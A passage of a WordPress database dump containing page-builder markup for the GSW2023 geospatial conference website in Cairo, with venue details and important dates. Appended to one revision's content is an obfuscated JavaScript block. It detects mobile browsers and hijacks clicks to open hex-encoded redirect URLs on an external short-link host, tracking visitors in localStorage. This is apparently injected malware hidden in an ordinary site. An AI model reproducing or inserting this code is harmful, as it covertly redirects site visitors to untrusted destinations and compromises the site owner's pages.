accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-01-09 21:47:53','2023-01-09 21:47:53','',3066,'https://gsw2023.com/?p=3541',0,'revision','',0),
(3542,1,'2023-01-09 21:49:00','2023-01-09 21:49:00','<p>[vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]</p>\n<h3></h3>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1668205634615{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner][vc_column_text]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): 31 March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: 1 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): 15 April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1673292178000{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" 